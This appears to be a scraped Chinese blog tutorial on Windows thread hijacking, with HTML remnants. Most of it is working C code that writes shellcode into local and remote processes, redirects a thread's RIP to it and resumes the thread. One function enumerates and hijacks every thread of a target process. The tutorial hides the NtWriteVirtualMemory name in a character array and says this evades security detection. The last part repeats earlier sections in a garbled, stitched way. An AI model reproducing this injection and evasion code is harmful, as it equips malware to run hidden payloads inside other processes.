线程劫持(Thread Hijacking)技术详解<\/h1>

1. 线程劫持概述<\/h2>
线程劫持(Thread Hijacking)是指攻击者通过某种方式劫持线程的执行流从而执行shellcode的技术。其核心思想是利用暂停目标线程、修改上下文来控制其执行流。<\/p>

2. 线程上下文基础<\/h2>

线程上下文指的是一个线程在执行时所需的所有信息集合，包括线程的寄存器和堆栈。<\/p>

关键API：<\/p>

GetThreadContext<\/code> - 获取线程上下文<\/li>

SetThreadContext<\/code> - 修改线程上下文<\/li>
<\/ul>
ContextFlags参数：<\/p>

只需要获取寄存器时使用CONTEXT_CONTROL<\/code><\/li>
获取全部上下文使用CONTEXT_ALL<\/code><\/li>
<\/ul>
3. 基本线程劫持流程<\/h2>

创建挂起线程<\/li>
获取线程上下文<\/li>
修改IP寄存器(RIP)<\/li>
恢复线程执行<\/li>
<\/ol>
3.1 创建挂起线程示例<\/h3>
void<\/span> test<\/span>(){
<\/span><\/span>    MessageBox(0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>HANDLE hThread =<\/span> CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)&<\/span>test, NULL, CREATE_SUSPENDED, NULL);
<\/span><\/span><\/code><\/pre>3.2 修改上下文并恢复线程<\/h3>
CONTEXT context;
<\/span><\/span>DWORD dwOldProtection =<\/span> NULL;
<\/span><\/span>context.ContextFlags =<\/span> CONTEXT_ALL;
<\/span><\/span>
<\/span><\/span>\/\/ 分配内存
<\/span><\/span><\/span><\/span>LPVOID lpMem =<\/span> VirtualAlloc(NULL, length, MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span>memcpy(lpMem, shellcode, length);
<\/span><\/span>VirtualProtect(lpMem, length, PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>
<\/span><\/span>\/\/ 获取上下文并修改RIP
<\/span><\/span><\/span><\/span>GetThreadContext(hThread, &<\/span>context);
<\/span><\/span>context.Rip =<\/span> (DWORD64)lpMem;
<\/span><\/span>SetThreadContext(hThread, &<\/span>context);
<\/span><\/span>
<\/span><\/span>\/\/ 恢复线程
<\/span><\/span><\/span><\/span>ResumeThread(hThread);
<\/span><\/span><\/code><\/pre>注意：使用calc的shellcode时，主线程执行完会退出，可以使用WaitForSingleObject<\/code>阻塞主线程。<\/p>
4. 劫持现有线程<\/h2>
4.1 枚举系统线程<\/h3>
使用CreateToolhelp32Snapshot<\/code>进行线程枚举：<\/p>
HANDLE hSnapShot =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
<\/span><\/span>THREADENTRY32 te32 =<\/span> {sizeof<\/span>(THREADENTRY32)};
<\/span><\/span>
<\/span><\/span>if<\/span>(Thread32First(hSnapShot, &<\/span>te32)){
<\/span><\/span>    do<\/span>{
<\/span><\/span>        wprintf(L<\/span>"TID: %lu<\/span>\n<\/span>"<\/span>, te32.th32ThreadID);
<\/span><\/span>    } while<\/span>(Thread32Next(hSnapShot, &<\/span>te32));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 劫持指定进程的线程<\/h3>
通过比对te32.th32OwnerProcessID<\/code>与指定进程PID来筛选线程：<\/p>
HANDLE hThread =<\/span> OpenThread(THREAD_ALL_ACCESS, false, te32.th32ThreadID);
<\/span><\/span>SuspendThread(hThread);
<\/span><\/span>
<\/span><\/span>LPVOID lpMem =<\/span> VirtualAlloc(NULL, length, MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span>memcpy(lpMem, shellcode, length);
<\/span><\/span>VirtualProtect(lpMem, length, PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>
<\/span><\/span>GetThreadContext(hThread, &<\/span>context);
<\/span><\/span>context.Rip =<\/span> (DWORD64)lpMem;
<\/span><\/span>SetThreadContext(hThread, &<\/span>context);
<\/span><\/span>
<\/span><\/span>ResumeThread(hThread);
<\/span><\/span>WaitForSingleObject(hThread, -<\/span>1<\/span>);
<\/span><\/span><\/code><\/pre>5. 远程线程劫持<\/h2>
5.1 创建挂起进程<\/h3>
STARTUPINFO si =<\/span> {sizeof<\/span>(STARTUPINFO)};
<\/span><\/span>PROCESS_INFORMATION pi;
<\/span><\/span>CreateProcess(NULL, _wcsdup(L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>nslookup.exe"<\/span>), NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span><\/code><\/pre>5.2 注入到远程进程<\/h3>
使用VirtualAllocEx<\/code>和NtWriteVirtualMemory<\/code>进行注入（避免使用敏感的WriteProcessMemory<\/code>）：<\/p>
typedef<\/span> NTSTATUS<\/span>(NTAPI *<\/span>pNtWriteVirtualMemory)(
<\/span><\/span>    IN HANDLE ProcessHandle,
<\/span><\/span>    IN PVOID BaseAddress,
<\/span><\/span>    IN PVOID Buffer,
<\/span><\/span>    IN ULONG NumberOfBytesToWrite,
<\/span><\/span>    OUT PULONG NumberOfBytesWritten OPTIONAL);
<\/span><\/span>
<\/span><\/span>char<\/span> str1[] =<\/span> {'N'<\/span>,'t'<\/span>,'W'<\/span>,'r'<\/span>,'i'<\/span>,'t'<\/span>,'e'<\/span>,'V'<\/span>,'i'<\/span>,'r'<\/span>,'t'<\/span>,'u'<\/span>,'a'<\/span>,'l'<\/span>,'M'<\/span>,'e'<\/span>,'m'<\/span>,'o'<\/span>,'r'<\/span>,'y'<\/span>,'\0'<\/span>};
<\/span><\/span>pNtWriteVirtualMemory NtWriteVirtualMemory =<\/span> (pNtWriteVirtualMemory)GetProcAddress(LoadLibraryA("ntdll.dll"<\/span>), str1);
<\/span><\/span>
<\/span><\/span>LPVOID lpMem =<\/span> VirtualAllocEx(pi.hProcess, NULL, sizeof<\/span>(shellcode), MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span>NtWriteVirtualMemory(pi.hProcess, lpMem, shellcode, sizeof<\/span>(shellcode), NULL);
<\/span><\/span>VirtualProtectEx(pi.hProcess, lpMem, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span><\/code><\/pre>5.3 修改上下文并恢复执行<\/h3>
GetThreadContext(pi.hThread, &<\/span>context);
<\/span><\/span>context.Rip =<\/span> (DWORD64)lpMem;
<\/span><\/span>SetThreadContext(pi.hThread, &<\/span>context);
<\/span><\/span>ResumeThread(pi.hThread);
<\/span><\/span><\/code><\/pre>6. 远程线程枚举与劫持<\/h2>
完整远程线程枚举与劫持函数示例：<\/p>
void<\/span> remoteEnum<\/span>(DWORD targetPid){
<\/span><\/span>    char<\/span> str1[] =<\/span> {'N'<\/span>,'t'<\/span>,'W'<\/span>,'r'<\/span>,'i'<\/span>,'t'<\/span>,'e'<\/span>,'V'<\/span>,'i'<\/span>,'r'<\/span>,'t'<\/span>,'u'<\/span>,'a'<\/span>,'l'<\/span>,'M'<\/span>,'e'<\/span>,'m'<\/span>,'o'<\/span>,'r'<\/span>,'y'<\/span>,'\0'<\/span>};
<\/span><\/span>    pNtWriteVirtualMemory NtWriteVirtualMemory =<\/span> (pNtWriteVirtualMemory)GetProcAddress(LoadLibraryA("ntdll.dll"<\/span>), str1);
<\/span><\/span>    
<\/span><\/span>    HANDLE hProcess =<\/span> OpenProcess(PROCESS_ALL_ACCESS, false, targetPid);
<\/span><\/span>    HANDLE hSnapShot =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
<\/span><\/span>    
<\/span><\/span>    THREADENTRY32 te32;
<\/span><\/span>    te32.dwSize =<\/span> sizeof<\/span>(THREADENTRY32);
<\/span><\/span>    
<\/span><\/span>    CONTEXT context;
<\/span><\/span>    context.ContextFlags =<\/span> CONTEXT_ALL;
<\/span><\/span>    DWORD dwOldProtection;
<\/span><\/span>    
<\/span><\/span>    if<\/span>(Thread32First(hSnapShot, &<\/span>te32)){
<\/span><\/span>        do<\/span>{
<\/span><\/span>            if<\/span>(te32.th32OwnerProcessID ==<\/span> targetPid){
<\/span><\/span>                HANDLE hThread =<\/span> OpenThread(THREAD_ALL_ACCESS, false, te32.th32ThreadID);
<\/span><\/span>                if<\/span>(hThread !=<\/span> NULL){
<\/span><\/span>                    LPVOID lpMem =<\/span> VirtualAllocEx(hProcess, NULL, sizeof<\/span>(shellcode), MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span>                    NtWriteVirtualMemory(hProcess, lpMem, shellcode, sizeof<\/span>(shellcode), NULL);
<\/span><\/span>                    VirtualProtectEx(hProcess, lpMem, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>                    
<\/span><\/span>                    SuspendThread(hThread);
<\/span><\/span>                    GetThreadContext(hThread, &<\/span>context);
<\/span><\/span>                    context.Rip =<\/span> (DWORD64)lpMem;
<\/span><\/span>                    SetThreadContext(hThread, &<\/span>context);
<\/span><\/span>                    ResumeThread(hThread);
<\/span><\/span>                    WaitForSingleObject(hThread, -<\/span>1<\/span>);
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        } while<\/span>(Thread32Next(hSnapShot, &<\/span>te32));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>7. 注意事项<\/h2>

劫持不一定是主线程，执行可能需要一些时间<\/li>
劫持的线程可能不会持续运行<\/li>
使用NtWriteVirtualMemory<\/code>等替代API可以绕过一些安全检测<\/li>
主线程不能被劫持（因为无法挂起）<\/li>
<\/ol>

线程劫持(Thread Hijacking)技术详解<\/h1>

1. 线程劫持概述<\/h2> 线程劫持(Thread Hijacking)是指攻击者通过某种方式劫持线程的执行流从而执行shellcode的技术。其核心思想是利用暂停目标线程、修改上下文来控制其执行流。<\/p>

5. 远程线程劫持<\/h2>

7. 注意事项<\/h2> 劫持不一定是主线程，执行可能需要一些时间<\/li> 劫持的线程可能不会持续运行<\/li> 使用NtWriteVirtualMemory<\/code>等替代API可以绕过一些安全检测<\/li> 主线程不能被劫持（因为无法挂起）<\/li> <\/ol>

1. 线程劫持概述<\/h2>
线程劫持(Thread Hijacking)是指攻击者通过某种方式劫持线程的执行流从而执行shellcode的技术。其核心思想是利用暂停目标线程、修改上下文来控制其执行流。<\/p>

7. 注意事项<\/h2>

劫持不一定是主线程，执行可能需要一些时间<\/li>
劫持的线程可能不会持续运行<\/li>
使用`NtWriteVirtualMemory<\/code>等替代API可以绕过一些安全检测<\/li>`
`主线程不能被劫持（因为无法挂起）<\/li> <\/ol>`